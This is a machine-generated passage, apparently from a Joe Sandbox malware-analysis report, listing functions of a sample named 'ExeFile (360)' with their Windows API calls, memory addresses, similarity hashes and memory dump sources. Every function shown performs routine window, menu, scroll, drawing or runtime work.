Part of subcall function 00433913: ShowWindow.USER32(?,00405ADD,0043C400,00000000,?,00000000,00446637,?,?,?,00405ADD), ref: 00433921

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$Rect$DesktopMoveShowVisible
String ID:
API String ID: 3835705305-0
Opcode ID: 3ac69640b21fee02fc83a66d4409157b72de74bba9ec744072ed92a7bcb11b9b
Instruction ID: ddbdf715bb6796b2f154086cab02da681abc1286eb997f78146f5606642e7c69
Opcode Fuzzy Hash: 3ac69640b21fee02fc83a66d4409157b72de74bba9ec744072ed92a7bcb11b9b
Instruction Fuzzy Hash: 4B5129B1A0020AEFCB04DFA8C985DAEB7B9EF48345B14446DF506EB250CB75EE41CB64

Function 0042274D Relevance: 6.1, APIs: 4, Instructions: 135fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,?,?), ref: 00422814

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6665291326b0c78e995fec7cba142a89573cede6fc6c0d8355a069a231b876a1
Instruction ID: 51ea4a2420c5751b95ffe50fd31b4276198d69d1f967d538bb6e69122b46897a
Opcode Fuzzy Hash: 6665291326b0c78e995fec7cba142a89573cede6fc6c0d8355a069a231b876a1
Instruction Fuzzy Hash: 0A519471A00218FFCB11DF68D984AEE7BB4FF85340F6086AAE815DB251D7B4DA40CB59

Function 0042AD00 Relevance: 6.1, APIs: 4, Instructions: 131COMMON

Download Yara Rule

APIs

GetPropA.USER32(?,00000000), ref: 0042AD46
CallWindowProcA.USER32(00000000), ref: 0042AD71

Part of subcall function 00428280: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 004282A6
Part of subcall function 00428280: RemovePropA.USER32(?,00000000), ref: 004282BE
Part of subcall function 00428280: RemovePropA.USER32(?,00000000), ref: 004282CA

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID:
API String ID: 2276450057-0
Opcode ID: dd4aa0d315bdc8dcbad2f8b3bb9e2b4cdfe9929186ce299ef6494c16bf6e5d15
Instruction ID: 9e17fcb999b77c44549c12cacaead48576d88cb61d3d38a48a02d3c9e0459795
Opcode Fuzzy Hash: dd4aa0d315bdc8dcbad2f8b3bb9e2b4cdfe9929186ce299ef6494c16bf6e5d15
Instruction Fuzzy Hash: B7312976B103245BD610A605FC41BAFB39AFB86726FC40537FD0483241E72DAD69866F

Function 004402E2 Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

Part of subcall function 0043E0B4: GetDlgCtrlID.USER32(?), ref: 0043E0C2
Part of subcall function 0043E0B4: IsChild.USER32(?,?), ref: 0043E0D6

GetScrollPos.USER32(?,00000002), ref: 00440323
GetScrollPos.USER32(?,00000002), ref: 00440343
SetScrollPos.USER32(?,00000002,?,00000000), ref: 0044038E
SetScrollPos.USER32(?,00000002,?,00000000), ref: 004403F7

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Scroll$ChildCtrl
String ID:
API String ID: 656700424-0
Opcode ID: 34e33c614e1a320b59b7ab5c1ef02fd0631ee2ede8557fa731ace7256577c007
Instruction ID: d2d60c84430c3be31e0c094e2f56b6c08dcf5d2728619bca707d8ba1c13a9d1a
Opcode Fuzzy Hash: 34e33c614e1a320b59b7ab5c1ef02fd0631ee2ede8557fa731ace7256577c007
Instruction Fuzzy Hash: 0E413C71A00209EFEF109FA5C885EAEBBB9FF48354F10416AFA05AB292C7749D50DB50

Function 00440439 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 0043E0B4: GetDlgCtrlID.USER32(?), ref: 0043E0C2
Part of subcall function 0043E0B4: IsChild.USER32(?,?), ref: 0043E0D6

GetScrollPos.USER32(?,00000002), ref: 00440480
GetScrollPos.USER32(?,00000002), ref: 0044049E
SetScrollPos.USER32(?,00000002,00000000,00000000), ref: 004404EA
SetScrollPos.USER32(?,00000002,00000000,00000000), ref: 0044054A

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Scroll$ChildCtrl
String ID:
API String ID: 656700424-0
Opcode ID: 420851e8ba46a22bed42bf259f2510a98b01ecf413294f22ae6374f31896ece4
Instruction ID: b8f9963dd9dd1463434906f230581dc37bc0a4b0c0b13d2dbe13a2dd0f2068fa
Opcode Fuzzy Hash: 420851e8ba46a22bed42bf259f2510a98b01ecf413294f22ae6374f31896ece4
Instruction Fuzzy Hash: E4410231A00209AFEF11DF54D885BAEBBB5EF04315F108159EA05AB291C775DEA0DF94

Function 0044EF06 Relevance: 6.1, APIs: 4, Instructions: 117COMMON

Download Yara Rule

APIs

ShowScrollBar.USER32(?,00000000,00000000), ref: 0044EF36
ShowScrollBar.USER32(?,00000001,?), ref: 0044EF71
MulDiv.KERNEL32(?,?,?), ref: 0044F044
MulDiv.KERNEL32(?,?,?), ref: 0044F051

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ScrollShow
String ID:
API String ID: 3611344627-0
Opcode ID: 34cac0623e81680f1f98a131965f319cfb73872837d06113884fdd6a4135fa97
Instruction ID: 59c43799c825de3ac95d63219bbd87341b41f52c8c2ada8630db2efc4e7453c6
Opcode Fuzzy Hash: 34cac0623e81680f1f98a131965f319cfb73872837d06113884fdd6a4135fa97
Instruction Fuzzy Hash: 4E417B70600605AFDB24DF29C880EAABBF5FF48304F10856EF91A9B362D774E851DB94

Function 00442109 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000000), ref: 0044211F

Part of subcall function 00448181: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,5!D), ref: 004481C0
Part of subcall function 00448181: CreatePatternBrush.GDI32(00000000), ref: 004481CD
Part of subcall function 00448181: DeleteObject.GDI32(00000000), ref: 004481D9

GetSystemMetrics.USER32(00000020), ref: 00442165
GetSystemMetrics.USER32(00000021), ref: 0044216D
InflateRect.USER32(?,000000FF,000000FF), ref: 004421C3

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CreateMetricsObjectSystem$BitmapBrushDeleteInflatePatternRectStock
String ID:
API String ID: 419749085-0
Opcode ID: bed477b53b59c011b776d41847b8f29fae9eff25c806e38322cc4df037e7a258
Instruction ID: c105ea4a06f0798c8c939aaf0cbf72fdfd36e74f9c1ee66e0d92e766a27f890f
Opcode Fuzzy Hash: bed477b53b59c011b776d41847b8f29fae9eff25c806e38322cc4df037e7a258
Instruction Fuzzy Hash: AB417E71D006199BDF11CFA4C984A9EB7F1AF09310F5142A6FE10BB295C3B5AE41CF94

Function 0042C584 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0042C637
wsprintfA.USER32 ref: 0042C658

Strings

%02d, xrefs: 0042C631
%ld, xrefs: 0042C652

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: wsprintf
String ID: %02d$%ld
API String ID: 2111968516-3415628970
Opcode ID: dcb49a8e07551605e74cc55943cb7320ecceb0d09199179645ebd59fea1add3e
Instruction ID: 06f31d233a7528199c76eaf9bf888bafc36f0079c2c7a5a2a38a2c4c40990d86
Opcode Fuzzy Hash: dcb49a8e07551605e74cc55943cb7320ecceb0d09199179645ebd59fea1add3e
Instruction Fuzzy Hash: D4318D713043A9AFD3348918AC807BEBBD5AB55740F60182FEDC5CB342E6789D1A836D

Function 00407B50 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

CopyRect.USER32(?,?), ref: 00407BB0
GetSysColor.USER32(0000000D), ref: 00407BBE
GetSysColor.USER32(00000011), ref: 00407C2E

Part of subcall function 00407C90: GetSysColor.USER32(00000004), ref: 00407D01
Part of subcall function 00407C90: CreateSolidBrush.GDI32(00000000), ref: 00407D12
Part of subcall function 00407C90: CopyRect.USER32(?,?), ref: 00407D3A
Part of subcall function 00407C90: CopyRect.USER32(?,?), ref: 00407D45
Part of subcall function 00407C90: CopyRect.USER32(?,?), ref: 00407D4D

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CopyRect$Color$BrushCreateSolid
String ID:
API String ID: 3018063195-0
Opcode ID: b020a150538fdb779c134a53e62879b2440253d54fdccf020db01dd0bca89e78
Instruction ID: 8821a56df39b926cbc2678fb3078c564674f067e5e026b8e6085b75af659928f
Opcode Fuzzy Hash: b020a150538fdb779c134a53e62879b2440253d54fdccf020db01dd0bca89e78
Instruction Fuzzy Hash: D231B171208701ABD304DF65C945F5AB3E8BB98B14F000A2EF546A7381DB38AC45CBAA

Function 004163AD Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0041641D
SysFreeString.OLEAUT32(?), ref: 0041648C
SysFreeString.OLEAUT32(?), ref: 00416496
SysFreeString.OLEAUT32(?), ref: 004164A0

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: FreeString$ClearVariant
String ID:
API String ID: 3349467263-0
Opcode ID: f6c6f4734c2437d75ef5d191447a1df4816d2741c2a748c026289dc971c6a24d
Instruction ID: cd30198b14a57f12ab56bb3ae0c731eed18fcf592e96afc6ad1a204c34c19a16
Opcode Fuzzy Hash: f6c6f4734c2437d75ef5d191447a1df4816d2741c2a748c026289dc971c6a24d
Instruction Fuzzy Hash: 26313C71900218BFCB10DFA5C884ADEBBB9FF08715F50811AF509A7241D778A984CFA8

Function 004094C0 Relevance: 6.1, APIs: 4, Instructions: 98windowCOMMON

Download Yara Rule

APIs

ModifyMenuA.USER32(?,?,?,?,?), ref: 00409528
ModifyMenuA.USER32(?,?,?,?,?), ref: 00409549
ModifyMenuA.USER32(?,?,?,?,00000000), ref: 0040956A
ModifyMenuA.USER32(?,?,?,?,00000000), ref: 0040958C

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MenuModify
String ID:
API String ID: 2761097700-0
Opcode ID: 0bb20ae07314b6e4cb74cd22f98470e8de3e89a3010e4fed8cef9f4e487755d3
Instruction ID: f3ac8c914d3f2f7f872d7d2e642c0243332ea36e4725d9f90cf7aa79ae3e7b9b
Opcode Fuzzy Hash: 0bb20ae07314b6e4cb74cd22f98470e8de3e89a3010e4fed8cef9f4e487755d3
Instruction Fuzzy Hash: 78218F76301204AFD210DA59DC84E6BB7ACEBC57A5F00453AFA46D3382C735DC0587A4

Function 00450B44 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00450B49
ExtTextOutA.GDI32(?,?,?,?,?,?,?,?), ref: 00450BD7
GetTextAlign.GDI32(?), ref: 00450BEC
GetCurrentPositionEx.GDI32(?,?), ref: 00450BFD

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Text$AlignCurrentH_prologPosition
String ID:
API String ID: 2331262098-0
Opcode ID: a15c532c6cacb4f218322633b03ae58f849936e153b7f57633d57c5e4ef7eb49
Instruction ID: 537c769bd6202db3335d19b4b6974f88c5f3a9bac4a14c4dca8303b99f307b4d
Opcode Fuzzy Hash: a15c532c6cacb4f218322633b03ae58f849936e153b7f57633d57c5e4ef7eb49
Instruction Fuzzy Hash: A431467290021AAFCF129FA5D881CEFBB79FB08351B10412BF911A2251C7389A65CBE4

Function 004453ED Relevance: 6.1, APIs: 4, Instructions: 90windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00433753: GetWindowLongA.USER32(?,000000F0), ref: 0043375F

Part of subcall function 00445594: GetParent.USER32(?), ref: 0044559E
Part of subcall function 00445594: GetParent.USER32(00000000), ref: 004455A1

SendMessageA.USER32(?,00000234,00000000,00000000), ref: 00445465
SendMessageA.USER32(?,00000229,00000000,00000000), ref: 0044548C
SendMessageA.USER32(?,00000224,00000000,00000000), ref: 004454A2
SendMessageA.USER32(?,00000229,00000000,00000000), ref: 004454AF

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MessageSend$Parent$LongWindow
String ID:
API String ID: 4191550487-0
Opcode ID: cf5361581aeae784932734779cfc831f73b25fd3929243179928b1672fc596fb
Instruction ID: 00c4d239080beae462ce696b475b10b8bf359d6397e9b9b0716471a8e4150551
Opcode Fuzzy Hash: cf5361581aeae784932734779cfc831f73b25fd3929243179928b1672fc596fb
Instruction Fuzzy Hash: 70210770380B14BBFE356A119C46F6F714ADB80B19F10452FF1019E2D2CBACAD81866E

Function 0043C570 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0043C6E8: GetParent.USER32(?), ref: 0043C71B
Part of subcall function 0043C6E8: GetLastActivePopup.USER32(?), ref: 0043C72A
Part of subcall function 0043C6E8: IsWindowEnabled.USER32(?), ref: 0043C73F
Part of subcall function 0043C6E8: EnableWindow.USER32(?,00000000), ref: 0043C752

SendMessageA.USER32(?,00000376,00000000,00000000), ref: 0043C5A6
GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 0043C614
MessageBoxA.USER32(00000000,?,?,00000000), ref: 0043C622
EnableWindow.USER32(00000000,00000001), ref: 0043C63E

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
String ID:
API String ID: 1958756768-0
Opcode ID: e35af4d0491c9b50b8d950b7bf8b7534f12eaa55fa585f6e8c07527d4ad5b527
Instruction ID: 3bf8e0bba014b5c7ba9277401f91cf5d21f7e774e39c5ccfc09d32cbbd3d464c
Opcode Fuzzy Hash: e35af4d0491c9b50b8d950b7bf8b7534f12eaa55fa585f6e8c07527d4ad5b527
Instruction Fuzzy Hash: 5E218272900228FBDB209F98CCC6AAEB7B5EB48755F24143AE615F7290C774AD408B94

Function 0041AA65 Relevance: 6.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32 ref: 0041AA8B

Part of subcall function 0041E68F: HeapCreate.KERNELBASE(00000000,00001000,00000000,0041AAC3,00000001), ref: 0041E6A0
Part of subcall function 0041E68F: HeapDestroy.KERNEL32 ref: 0041E6BE

GetCommandLineA.KERNEL32 ref: 0041AAEB
GetStartupInfoA.KERNEL32(?), ref: 0041AB16
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0041AB39

Part of subcall function 0041AB92: ExitProcess.KERNEL32 ref: 0041ABAF

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
String ID:
API String ID: 2057626494-0
Opcode ID: d8c28dc3d317d196ce9a034867e386b6a28c9b2523d368334be649822b674f09
Instruction ID: 7ac0db77f98737e46effb01c22ae3717e542d033f31e3e4dde8bbfddf46b55e0
Opcode Fuzzy Hash: d8c28dc3d317d196ce9a034867e386b6a28c9b2523d368334be649822b674f09
Instruction Fuzzy Hash: 4E21D8B0E407159FD704EFA6EC55BAE77A5EF04714F10412FF9019B292EB788480CB5A

Function 00409A10 Relevance: 6.1, APIs: 4, Instructions: 75windowCOMMON

Download Yara Rule

APIs

IsMenu.USER32(?), ref: 00409A30
GetMenuItemCount.USER32(?), ref: 00409A54
GetSubMenu.USER32(?,00000000), ref: 00409A63
GetMenuItemCount.USER32(?), ref: 00409AB6

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Menu$CountItem
String ID:
API String ID: 3435231853-0
Opcode ID: 937aba0db7e52b4e388ad7a4fe38f1fd2852128088dc5cde7a918657e7e7a317
Instruction ID: 3e9d731093cdd7075dde9715597b4e7de385e5e6f08e177c13a40ddb33d9ba1b
Opcode Fuzzy Hash: 937aba0db7e52b4e388ad7a4fe38f1fd2852128088dc5cde7a918657e7e7a317
Instruction Fuzzy Hash: 52217C713047809BC710DF66C894A2BB7E9EB89B14F540A3EF456D7282DB39EC01CB69

Function 00447391 Relevance: 6.1, APIs: 4, Instructions: 74stringCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00447396
GetDlgCtrlID.USER32(?), ref: 004473DA
lstrcpynA.KERNEL32(?,?,00000050), ref: 0044741F
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 00447440

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CtrlH_prologWindowlstrcpyn
String ID:
